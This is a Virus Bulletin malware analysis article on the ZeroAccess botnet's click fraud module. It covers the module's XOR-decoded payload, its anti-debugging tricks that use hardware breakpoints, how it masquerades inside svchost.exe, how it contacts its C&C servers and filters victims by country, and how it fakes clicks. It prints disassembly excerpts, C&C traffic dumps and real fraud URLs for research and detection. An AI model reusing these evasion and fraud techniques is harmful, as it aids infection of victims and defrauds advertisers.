Click fraud has been one of the biggest concerns for online advertisers for many years, and as researchers invest effort into developing pattern recognition and detection mechanisms to identify the fraudulent patterns, so the attackers tweak and evolve their click fraud methodologies. Wayne Low takes a look at the internal workings of the click fraud module of ZeroAccess.
Copyright © 2013 Virus Bulletin
Automated systems for clicking on advertisements that are displayed online for monetary gain – essentially, click fraud – has been one of the biggest concerns for online advertisers for many years. The major advertising networks, such as Google’s AdWords/AdSense, put significant effort into developing pattern recognition and detection mechanisms to identify the click patterns typically used by spammers and/or botnets engaging in click fraud.
To avoid being detected by such mechanisms, the methodology for click fraud used by botnets such as ZeroAccess (also known as clickbots) has been evolving steadily. While there are plenty of comprehensive analyses of ZeroAccess (e.g. [1]), there has been no detailed elaboration of how the ZeroAccess clickbot works internally – looking at its actions on the client machine and how it performs the click fraud operation.
The purpose of this article is to dissect the internal workings of ZeroAccess’s click fraud module and to highlight the following details of the botnet’s click fraud implementation:
How it uses a ‘traditional’ method to initialize socket functions for overlapped I/O operations, which allows simultaneous connections that can also serve as an anti debugging feature.
How it only targets specific countries, most likely because it is targeting country- or region-specific advertising networks.
How it includes functionality to randomize the clicks performed, preventing an unnaturally regular pattern that could alert suspicion from advertisers or the advertising networks.
How it uses a window-less browser to mimic legitimate clicks, making it appear as though the fraudulent clicks came from real users.
Note: The analysis that follows uses a click fraud sample (sha1: 223b257f1e810bf106819c0ec33387712a56e175) that was downloaded from the botnet in January 2013 and differs from samples examined in previous ZeroAccess-related papers. As such, some details mentioned here, such as the TCP port, will vary from previous reports.
The ZeroAccess malware can arrive on a client machine via many different routes, but it does so most commonly through a dropper that includes the malware as part of its payload. Once the dropper has successfully infected the machine, it downloads additional plug-in files – including the click fraud module, which has the file extension ‘@’.
This module acts as a loader for the click fraud binary, which is embedded immediately before the memcpy function. The binary is compressed as a Microsoft Cabinet file and encoded using a simple rotate left XOR algorithm with the key 0x12345678:
key = 0x12345678u; do{ *(DWORD*)szClickfraudCode ^= key; key = key << 1; szClickfraudCode = (char *)szClickfraudCode + 4; --dwClickFraudCodeSize; }while ( dwClickFraudCodeSize );
After the decoding operation, the binary will be decompressed using Cabinet API functions. The result of the decompression consists of a single binary file named noreloc.cod.
Noreloc.cod consists of a shellcode and an embedded DLL file (see Figure 1). This binary file will be injected into the svchost.exe process job created by the plug-in module.
(Click here to view a larger version of Figure 1.)
In older ZeroAccess variants, the shellcode was only found in the malware dropper. In more recent variants, similar shellcode can also be found in the click fraud module. Whatever the location, in general, it serves two purposes:
Deploying an anti-debugging feature
Loading an embedded MZ PE executable file.
The shellcode will register a vectored exception handler (VEH) using RtlAddVectoredExceptionHandler. An exception must be triggered to invoke this exception handler. In order to achieve this, the shellcode sets a hardware breakpoint at debug register Dr3 through a context structure. This context is then set to the thread using ZwSetContextThread.
The purpose of VEH is to intercept ZwMapViewOfSection in order to impersonate a legitimate process running malicious code (see Listing 1).
.text:0100392F /*
.text:0100392F Set DEBUG_REGISTER (Dr3) to ZwMapViewOfSection function addr
.text:0100392F */
.text:0100392F xor eax, eax
.text:01003931 lea edi, [ebp+Context]
.text:01003937 mov ecx, 0B3h
.text:0100393C rep stosd
.text:0100393E mov [ebp+Context.ContextFlags], CONTEXT_DEBUG_REGISTERS
.text:01003948 mov [ebp+Context.Dr7], 40h ; L3 bit set => local breakpoint (dr3) enabled
.text:01003952 call GetZwMapViewOfSectionString
.text:01003957 push eax ; eax = “ZwMapViewOfSection”
.text:01003958 call _GetFunctionAddrByName
.text:0100395D mov [ebp+Context.Dr3], eax ; eax = Function address of ZwMapViewOfSection
.text:01003963 lea eax, [ebp+Context]
.text:01003969 push eax
.text:0100396A push 0FFFFFFFEh
.text:0100396C call _CallZwSetContextThread
.text:01003971 pop ecx
.text:01003972 pop ecx
.text:01003973 call _GetSmssExeString
.text:01003978 push 10h
.text:0100397A mov esi, eax
.text:0100397C pop eax
.text:0100397D call _StackspaceAlloc_0
.text:01003982 lea eax, [ebp+usSmss]
.text:01003985 push esi
.text:01003986 push eax
.text:01003987 call _CallRtlInitUnicodeString
.text:0100398C lea eax, [ebp+SmssAddrSpace]
.text:0100398F push eax
.text:01003990 lea eax, [ebp+usSmss]
.text:01003993 push eax
.text:01003994 xor esi, esi
.text:01003996 push esi
.text:01003997 push esi
.text:01003998 call _CallLdrLoadDll
.text:0100399D mov edi, eax
.text:0100399F lea eax, [ebp+Context]
Listing 1: Code that intercepts ZwMapViewOfSection.
LdrLoadDll has a function prototype as follows:
When the shellcode executes the function LdrLoadDll with ‘smss.exe’ (Session Manager Subsystem) as the DllName, the hardware breakpoint on ZwMapViewOfSection will be hit. The reason the breakpoint is hit can be seen in the following call stack:
0007cc08 7c91c3da 0000006c ffffffff 0007cce0 ntdll!ZwMapViewOfSection 0007ccfc 7c916071 00000000 0007cd88 00000000 ntdll!LdrpMapDll+0x330 0007cfbc 7c9162da 00000000 00000000 00000000 ntdll!LdrpLoadDll+0x1e9 0007d264 00090314 00000000 00000000 0007d618 ntdll!LdrLoadDll+0x230 WARNING: Frame IP not in any known module. Following frames may be wrong. 0007d650 0009046f 00090688 0007ffa4 7c900000 0x90314 0007ffc0 7c816fd7 00000000 00000000 00000000 0x9046f 0007fff0 00000000 00090000 00000000 78746341 kernel32!BaseProcessStart+0x23
If there is a debugger present and it handles the exception, no VEH will be triggered – ZwMapViewOfSection will continue execution and eventually, LdrLoadDll will return the original value of smss.exe in DllHandle. If a debugger is present, VEH will take over ZwMapViewOfSection’s execution flow and return the attacker’s desired DllHandle value to shellcode. This value holds the click fraud code and will be executed at the end of the shellcode.
After the shellcode has accomplished its task, it will load and pass execution control to smss.exe, as shown in a process environment block (PEB) of svchost.exe (Listing 2).
kd> !peb
PEB at 7ffde000
InheritedAddressSpace: No
ReadImageFileExecOptions: No
BeingDebugged: No
ImageBaseAddress: 01000000
Ldr 001a1e90
Ldr.Initialized: Yes
Ldr.InInitializationOrderModuleList: 001a1f28 . 001a35e0
Ldr.InLoadOrderModuleList: 001a1ec0 . 001a35d0
Ldr.InMemoryOrderModuleList: 001a1ec8 . 001a35d8
Base TimeStamp Module
1000000 41107ed6 Aug 04 14:14:46 2004 C:\WINDOWS\system32\svchost.exe
7c900000 411096b4 Aug 04 15:56:36 2004 C:\WINDOWS\system32\ntdll.dll
7c800000 46239bd5 Apr 16 23:52:53 2007 C:\WINDOWS\system32\kernel32.dll
77dd0000 411096a7 Aug 04 15:56:23 2004 C:\WINDOWS\system32\ADVAPI32.dll
77e70000 46923520 Jul 09 21:16:16 2007 C:\WINDOWS\system32\RPCRT4.dll
5cb70000 411096ba Aug 04 15:56:42 2004 C:\WINDOWS\system32\ShimEng.dll
6f880000 4110968e Aug 04 15:55:58 2004 C:\WINDOWS\AppPatch\AcGenral.DLL
7e410000 45f02d7c Mar 08 23:36:28 2007 C:\WINDOWS\system32\USER32.dll
77f10000 47bbcdd9 Feb 20 14:51:05 2008 C:\WINDOWS\system32\GDI32.dll
76b40000 411096d6 Aug 04 15:57:10 2004 C:\WINDOWS\system32\WINMM.dll
774e0000 42e5be93 Jul 26 12:39:47 2005 C:\WINDOWS\system32\ole32.dll
77c10000 41109752 Aug 04 15:59:14 2004 C:\WINDOWS\system32\msvcrt.dll
77120000 47559e94 Dec 05 02:38:12 2007 C:\WINDOWS\system32\OLEAUT32.dll
77be0000 411096cf Aug 04 15:57:03 2004 C:\WINDOWS\system32\MSACM32.dll
77c00000 411096b7 Aug 04 15:56:39 2004 C:\WINDOWS\system32\VERSION.dll
7c9c0000 47216027 Oct 26 11:33:59 2007 C:\WINDOWS\system32\SHELL32.dll
77f60000 45091361 Sep 14 16:31:29 2006 C:\WINDOWS\system32\SHLWAPI.dll
769c0000 411096b9 Aug 04 15:56:41 2004 C:\WINDOWS\system32\USERENV.dll
5ad70000 411096bb Aug 04 15:56:43 2004 C:\WINDOWS\system32\UxTheme.dll
76390000 411096ae Aug 04 15:56:30 2004 C:\WINDOWS\system32\IMM32.DLL
629c0000 411096aa Aug 04 15:56:26 2004 C:\WINDOWS\system32\LPK.DLL
74d90000 411096ba Aug 04 15:56:42 2004 C:\WINDOWS\system32\USP10.dll
773d0000 44ef1b33 Aug 25 23:45:55 2006 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03\comctl32.dll
5d090000 44ef1b36 Aug 25 23:45:58 2006 C:\WINDOWS\system32\comctl32.dll
6b0000 505ebd88 Sep 23 15:43:04 2012 C:\WINDOWS\system32\smss.exe
71ab0000 411096f2 Aug 04 15:57:38 2004 C:\WINDOWS\system32\WS2_32.dll
71aa0000 411096f3 Aug 04 15:57:39 2004 C:\WINDOWS\system32\WS2HELP.dll
78130000 480eb81c Apr 23 12:16:28 2008 C:\WINDOWS\system32\urlmon.dll
78000000 480eb822 Apr 23 12:16:34 2008 C:\WINDOWS\system32\iertutil.dll
72d20000 411096c6 Aug 04 15:56:54 2004 C:\WINDOWS\system32\wdmaud.drv
71a50000 41109758 Aug 04 15:59:20 2004 C:\WINDOWS\system32\mswsock.dll
ffd0000 40eb5d28 Jul 07 10:17:12 2004 C:\WINDOWS\system32\rsaenh.dll
435d0000 480eb81d Apr 23 12:16:29 2008 C:\WINDOWS\system32\mshtml.dll
746c0000 45516526 Nov 08 13:03:34 2006 C:\WINDOWS\system32\msls31.dll
76bf0000 411096ca Aug 04 15:56:58 2004 C:\WINDOWS\system32\PSAPI.DLL
662b0000 411096a0 Aug 04 15:56:16 2004 C:\WINDOWS\system32\hnetcfg.dll
71a90000 411096fd Aug 04 15:57:49 2004 C:\WINDOWS\System32\wshtcpip.dll
SubSystemData: 00000000
ProcessHeap: 000a0000
ProcessParameters: 00020000
CurrentDirectory: ‘C:\WINDOWS\system32\’
WindowTitle: ‘C:\WINDOWS\system32\svchost.exe’
ImageFile: ‘C:\WINDOWS\system32\svchost.exe’
CommandLine: ‘\\.\globalroot\systemroot\Installer\{5e0dd525-1703-4a82-4e5e-73ea03452de4}\U’
Listing 2: Smss.exe loaded in svchost.exe by shellcode.
The PEB result shows that the malware has successfully disguised the Session Manager Subsystem running the click fraud code; indeed the PEB output raises the following questions:
Why is a process address space allowed to contain two executable images?
Shouldn’t only one instance of smss.exe be running as an independent process?
On the other hand, these occurrences could be used as indicators that the machine has been infected.
Once the click fraud routine has gained execution control, we immediately see another anti-debugging routine similar to the previous one; this routine, however, is slightly more straightforward. Again, it sets a hardware breakpoint at debug register Dr3, pointing to the WSPStartup function address (see Listing 3).
.text:10002F8F push offset aWspstartup ; “WSPStartup”
.text:10002F94 push offset aSystem32Mswsoc ; “system32\\mswsock.dll”
.text:10002F99 call ds:LoadLibraryW
.text:10002F9F push eax ; hModule
.text:10002FA0 call ds:GetProcAddress
.text:10002FA6 mov edi, eax
.text:10002FA8 test edi, edi
.text:10002FAA jz loc_1000303B
.text:10002FB0 push offset _VEHExecWSPSendRecvFunc
.text:10002FB5 push 1
.text:10002FB7 call ds:RtlAddVectoredExceptionHandler
.text:10002FBD mov ebx, eax
.text:10002FBF test ebx, ebx
.text:10002FC1 jz short loc_1000303B
.text:10002FC3 push 2CCh ; Size
.text:10002FC8 lea eax, [ebp+Context]
.text:10002FCE push 0 ; Val
.text:10002FD0 push eax ; Dst
.text:10002FD1 call memset
.text:10002FD6 add esp, 0Ch
.text:10002FD9 lea eax, [ebp+Context]
.text:10002FDF /*
.text:10002FDF Set DEBUG_REGISTER (Dr3) to WSPStartup function addr
.text:10002FDF */
.text:10002FDF push eax ; Context
.text:10002FE0 push 0FFFFFFFEh ; ThreadHandle
.text:10002FE2 mov [ebp+Context.ContextFlags], CONTEXT_DEBUG_REGISTERS
.text:10002FEC mov [ebp+Context.Dr7], 40h ; L3 bit set => local breakpoint (dr3) enabled
.text:10002FF6 mov [ebp+Context.Dr3], edi ; edi = WSPStartup
.text:10002FFC call ds:ZwSetContextThread
.text:10003002 lea eax, [ebp+WSAData]
.text:10003008 push eax ; lpWSAData
.text:10003009 push 202h ; wVersionRequested
.text:1000300E call ds:WSAStartup
.text:10003014 test eax, eax
.text:10003016 jnz short loc_10003034
.text:10003018 push WSA_FLAG_OVERLAPPED ; dwFlags
.text:1000301A push eax ; g
.text:1000301B push eax ; lpProtocolInfo
.text:1000301C push IPPROTO_TCP ; protocol
.text:1000301E push SOCK_STREAM ; type
.text:10003020 push AF_INET ; af
.text:10003022 call ds:WSASocketW ; Triggered hardware breakpoint here
.text:10003028 cmp eax, 0FFFFFFFFh
.text:1000302B jz short loc_10003034
.text:1000302D push eax ; s
.text:1000302E call ds:closesocket
Listing 3: Code that sets up second anti-debugging hook.
Upon calling WSASocketW, a breakpoint exception will be triggered due to the previously set hardware breakpoint. If there is no debugger attached, the malware has the chance to handle the exception and execute its assigned code. Otherwise, the debugger will stop the program execution at the WSPStartup function, as shown in Figure 2. (Figure 2 also shows the call stack for WSASocketW.)
The intention of the exception handler is to initialize Windows socket callback functions. These callback functions are responsible for pre-processing the network data (for example, the data sent to the C&C server) and post-processing the data received from the server.
ZeroAccess’s clickbot is a multi-threaded DLL module that performs monetizing clicks. The main thread holds the major codes that generate huge numbers of clicks at regular intervals. It includes the following functionalities:
Determines whether the clients originate from specific geographic locations
Retrieves click fraud URLs from the C&C server
Executes click fraud based on the URLs retrieved from the C&C server
Sends click results to another remote server.
In order to carry out its click fraud routine effectively, the module registers a class named ‘z00clicker3’, which acts as a core function in the whole click fraud operation. The main thread interacts closely with z00clicker by sending messages to it. For instance, when the main thread successfully receives ad URLs from the C&C server, it sends a message to tell z00clicker to carry out the click fraud routine. The main thread is run in a loop that will be terminated under certain conditions.
One of the routines found in the main thread indicates that z00clicker only targets certain countries and is capable of locating a victim’s geographic location. The initial country code and time stamp of the malware’s installation date are stored by another plug in DLL, 80000000.@, in the Extended Attribute (EA) of z00clicker’s root directory:
The country code is retrieved from a third-party GeoIP location service provider every time the thread is executed. If the installation date is older than one day, the country code will be renewed. The renewal country code and current date will be saved to the EA of the U directory again.
After the country code is determined, it is compared against the predefined string ‘USGBAUCADEINESFRITSGMYNLSE’, which appears to be a list of country codes. The click fraud operations appear to be targeting online advertising networks that are highly specific to these countries.
Country code | Country name |
US | United States |
GB | Great Britain |
AU | Australia |
CA | Canada |
DE | Germany |
IN | India |
ES | Spain |
FR | France |
IT | Italy |
SG | Singapore |
MY | Malaysia |
NL | Netherlands |
SE | Sweden |
Table 1. Country codes.
The predefined string also indicates that IP addresses from those countries are permitted to contact the C&C server. If it is determined that the victim’s system resides in a country outside of this list, the main thread will be aborted and no click fraud operation will be carried out.
In fact, it appears that even if researchers manage to forge the country code by using proxy servers, the main thread will not perform its click fraud operation as the C&C server refuses to respond to any queries sent from the client. Clearly, the remote server has another layer of integrity checking to ensure that only actual infected clients in the targeted countries can perform the click fraud operation.
Assuming the request from the victim machine is accepted, the response from the C&C server consists of URLs needed to perform the click fraud. An overview of how the clickbot performs this is shown in Figure 3.
Before any of this can happen, however, the click fraud module on the infected machine has to find and communicate with one of the C&C servers.
The C&C server’s IP addresses are encoded and stored in the third IMAGE_RESOURCE_DATA_ENTRY in the resource section of the 00000001.@ plug-in DLL file saved in the U directory (Figure 4). These IP addresses are decoded using a simple XOR algorithm with the key 0x2CB7F6D5.
An IP address is chosen randomly from the pool of addresses and stored in a global variable that will be used later in the click fraud operation.
The first step of the click fraud operation is to send the victim system’s information, retrieved from the Windows native API ZwQuerySystemInformation, to a C&C server on TCP port 12757. Each C&C IP address obtained from the resource section is attempted until a TCP response is received from the server (see Figure 5).
After that, the data will be obfuscated using a XOR algorithm with key 0x72 before sending it to the randomly selected remote server that was previously stored in the global variable.
To avoid network latency, the main thread is suspended for a predetermined length of time specified in ZwDelayExecution. The suspended thread is resumed either when the time interval expires or when an alert is received from the ZwAlertThread API if the TCP data has been received and decoded successfully (see Listings 5 and 6).
00960054 8a 00 05 01 fb 01 00 00-4d 59 6f 00 ff 00 4d 6f ........MYo...Mo
00960064 7a 69 6c 6c 61 25 32 46-34 2e 30 2b 28 63 6f 6d zilla%2F4.0+(com
00960074 70 61 74 69 62 6c 65 25-33 42 2b 4d 53 49 45 2b patible%3B+MSIE+
00960084 37 2e 30 25 33 42 2b 57-69 6e 64 6f 77 73 2b 4e 7.0%3B+Windows+N
00960094 54 2b 35 2e 31 25 33 42-2b 2e 4e 45 54 2b 43 4c T+5.1%3B+.NET+CL
009600a4 52 2b 32 2e 30 2e 35 30-37 32 37 25 33 42 2b 2e R+2.0.50727%3B+.
009600b4 4e 45 54 2b 43 4c 52 2b-31 2e 31 2e 34 33 32 32 NET+CLR+1.1.4322
009600c4 25 33 42 2b 2e 4e 45 54-34 2e 30 43 25 33 42 2b %3B+.NET4.0C%3B+
Offset Description
0x00 Length of TCP data to be sent
0x02 Fixed value
0x03 Number of processor
0x04 Unknown value set by 80000000.@ plug-in DLL
0x08 Country code name
0x0a Available physical page size
0x0c Total physical page size
0x0e User agent string obtained via ObtainUserAgentString
Listing 4: System information that will be sent to the C&C server and explanation of its data structure.
.text:10003F14 mov eax, edi
.text:10003F16 call _SendSystemInfoDataToCnC
.text:10003F1B push offset Interval ; Interval
.text:10003F20 push 1 ; Alertable
.text:10003F22 call ds:ZwDelayExecution
.text:10003F28 cmp eax, STATUS_ALERTED ; The thread will return here until Interval is timed out or ZwAlertThread(TRUE) is called
.text:10003F2D jnz short loc_10003F35
.text:10003F2F push edi
.text:10003F30 call _ParseDecodedResponseFromCnCServer
Listing 5: Send the first TCP connection to the C&C server and wait for response by suspending thread.
.text:10003AD8 cmp ecx, 54h ; Minimum response length
.text:10003ADB jbe short @@not_valid_response
.text:10003ADD add eax, 0Ch ; HTTP response content
.text:10003AE0 @@loop_decode: ; CODE XREF: _DecodeCnCResponse+24j
.text:10003AE0 xor byte ptr [eax], 72h
.text:10003AE3 inc eax
.text:10003AE4 dec ecx
.text:10003AE5 jnz short @@loop_decode
.text:10003AE7 mov eax, [esi+78h]
.text:10003AEA push dword ptr [eax+0Ch] ; ThreadHandle
.text:10003AED call ds:ZwAlertThread
.text:10003AF3 @@not_valid_response: ; CODE XREF: _DecodeCnCResponse+Fj
.text:10003AF3 pop esi
.text:10003AF4 retn 4
Listing 6: Alert suspended thread after TCP response has been received and decoded.
The TCP response on port 12757 is merely a raw data set that needs to be pre-processed before the actual click fraud happens.
The data consists of a set of ‘referrer’ URLs, each with at least one accompanying ad URL, for example: [referrer URL A][ad URL A.1][ad URL A.2], [referrer URL B][ad URL B.1] [ad URL B.2]. After all the URL sets have been parsed, a new array of data structure is populated in which every referrer string is associated with an ad URL.
This data structure is then sorted in descending order based on the aggregate click counter of an ad URL (at offset 0x04) (see Figure 6), which is itself the result of the multiplier value (at offset 0x08) multiplied by the click counter at offset 0x0c+strlen(Referrer string) (see Listing 7).
009600a8 0000009d 0000000b 00000046 6f637469 ........F...itco
009600b8 69727970 2e746867 2f6d6f63 6466613f pyright.com/?afd
009600c8 39783d74 7a6f6662 37767669 39727930 t=x9bfozivv70yr9
009600d8 776e766f 78307a72 32663979 306d6c64 ovnwrz0xy9f2dlm0
009600e8 38637537 39727877 6d393668 7826676f 7uc8wxr9h69mog&x
009600f8 2633323d 26303d79 72616573 623d6863 =23&y=0&search=b
00960108 682b726b 746f7079 6b656568 0000d200 kr+hypotheek....
00960118 74746800 2f2f3a70 322e3539 312e3131 .http://95.211.1
00960128 312e3339 633f2f36 3d64696c 31613868 93.16/?clid=h8a1
00960138 34327370 307a7168 00000000 ps24hqz0....
Offset Description
0x00 Offset to next URL set
0x04 URL set identifier
0x08 Multiplier to click counter
0x0c Referer string
0x0c+strlen(Referer string) Click counter
0x0c+strlen(Referer string)+4 Array of ads URL ended with five null bytes
Listing 7: Raw data received from the C&C server and its data structure.
The first pair of referrer and ad URLs (on memory addresses 0x963694 and 0x96370d, respectively) is selected from the sorted data structure for use in the click fraud operation. This is considered a preliminary step to reduce the chances of having the clicks distributed too heavily on a particular URL – an unnatural pattern that may lead to the clicks being detected.
It has been observed that the referrer URL always contains the strings ‘afdt’ and ‘search’ in its parameters. Based on our observation, the referrer appears to be the domain names owned by the botnet operator, although we have not been able to verify this as the registrant information has been protected. These domains do, however, have one thing in common: they are parked domains [2] that use very similar structures and page designs, even down to the colours used.
The ad URL contains common strings such as ‘click’, ‘click2’, ‘clid’, ‘/feed/go.php’, etc., and is a redirection URL hosted on ad redirection servers. The redirection URL starts off a chain of HTTP redirections, and usually there are three HTTP redirections before the ad server – the search engine platform operated by the advertising network – is reached.
Example of referrer | Example of ads redirection URL |
http://folkartstore.com/?afdt=tccchozb2v52nxvwlheuh8wd3ir 3uovlp5c890kusagv&x=7&y=10&search=dentist+in+orange | |
http://romantictouch.com/?afdt=4gn7s65pl6xrq256y98ze2z6r q6jk4gxvrvwww5a5mbs&x=6&y=10&search=toner+skrivare | |
http://fillpositions.com/?afdt=lh03hi7eoj9tsh6lmub2vvxvxzid gr1b0709e0yy1mco&x=18&y=18&search=industrial+hearing+loss | |
http://itcopyright.com/?afdt=ix9ixvgg5a5hf6qonw5iq2nvjy3ti 7tazpx1e8gw30rl&x=6&y=11&search=power+juicing | http://216.172.54.*/feed/go.php?id=[random_GUI_ID]&sid=[32_random_hexadecimal]&n=n -[random_number]&tid=[random_number]&s=3548 |
Table 2. Example referrers and ad redirection URLs.
A ‘traditional’ fraudulent click can be implemented in many ways. The most common ones used are:
Intercepting Windows network APIs such as send, recv, WSPSend, WSPrecv, HTTPSendRequest, InternetReadFile, etc.
Installing malicious browser add-ons to hijack search results.
TDL, Redyms and Bamital are examples of malware families that perform Windows network API interception. Medfos and Simda are examples of malware that will install malicious browser extensions. However, ZeroAccess uses neither of these methods.
ZeroAccess’s click operation is carried out by the ‘z00clicker3’ callback function when it receives a message sent by the main thread (see Listing 8).
.text:10003C9A push ebx ; lParam = Parsed URL set data structure after sorting
.text:10003C9B push 1 ; wParam = Only 1 set of ads URL and referer to be sent
.text:10003C9D push 406h ; Msg = Send “click fraud action” message
.text:10003CA2 push dword ptr [eax+8] ; hWnd = z00clicker3 window
.text:10003CA5 call ds:SendMessageW
Listing 8: The main thread sends a ‘click fraud action’ message.
Upon receiving the message, z00clicker initiates an HTTP GET request using a random fake host name (which always contains the ‘.cm’ TLD, which was retrieved from the first TCP connection). The GET query is a Base64-encoded string generated by first running the ad redirection URL through a XOR algorithm (without the HTTP protocol prefix, with key 0x69) and then encoding the result using the algorithm. The GET request is sent through the Windows socket API, together with a fake host name, to the C&C server address instead of sending the request to the non existent host name. The C&C server replies with an HTTP 303 [3] response that contains the same ad redirection URL in the Location HTTP header field.
The URL in the HTTP Location header field indicates the botnet’s ad redirection server address. A separate GET request needs to be sent by the clickbot, which results in a series of HTTP 301/302 redirections that will reach the ad server.
An interesting thing found in z00clicker is its ability to mimic the way users interact with the ad server. It is able to do so without using Internet web browsers, which makes it unusual among clickbots. This is implemented with the following steps:
A COM object instance of IHTMLDocument2 is created using CoCreateInstance.
A URL moniker is created from the ad URL using CreateURLMonikerEx.
A bind context object named ‘__DWNBINDINFO’ is registered using ole32!CBindCtx::RegisterObjectParam. An important parameter in this function is a pointer to a data structure with various defined fields, most crucially the callback functions pointer. These callback functions ensure the attacker’s desired referrer string is set in the HTTP header before the ad redirection URL is loaded. Once the click has completed, it reports the result of which ad redirection URL has been clicked to another server on UDP port 123.
The ad redirection URL is loaded via the IPersistMoniker::Load() function. Using this COM method, the clickbot is able to emulate user interaction with the websites by using a combination of three or four HTTP redirections.
After the ad redirection URL is loaded, the ad redirection server will be contacted, followed by multiple HTTP redirections to reach the ad control server. The ad control server determines which destination ad server the traffic will be forwarded to. The random search query specified in the referrer string will be processed from the ad server.
A simplified overview of the redirections and servers involved in this process can be seen in Figure 8.
ZeroAccess has undoubtedly introduced a lot of innovative ways of achieving its goals, so a dissection of the click fraud module provides an interesting insight into how it differs from other ‘traditional’ clickbots. Highlights of the analysis include the country-specific targeting of the ZeroAccess click fraud, and the methods it uses to perform its fraudulent clicks without triggering the detection mechanisms used by search engines and online advertisers.
One of the remaining challenges in analysing the click fraud module involves circumventing the regional check implemented by the clickbot on both the client and the server’s side. Without more in depth knowledge of how the client interacts with the server, researchers – and the online advertising networks – are hampered in recognizing and developing detection algorithms to identify the click fraud generated by ZeroAccess.
[1] Wyke, J. The ZeroAccess Botnet – Mining and Fraud for Massive Financial Gain. http://www.sophos.com/en-us/medialibrary/PDFs/technical%20papers/Sophos_ZeroAccess_Botnet.pdf.
[2] Wikipedia. Domain parking. http://en.wikipedia.org/w/index.php?title=Domain_parking&oldid=540558973.
[3] Wikipedia. HTTP 303. http://en.wikipedia.org/w/index.php?title=HTTP_303&oldid=544821406.
[4] Microsoft Developer Network (MSDN). IpersisMoniker::Load method. http://msdn.microsoft.com/en-us/library/ms775044(v=vs.85).aspx.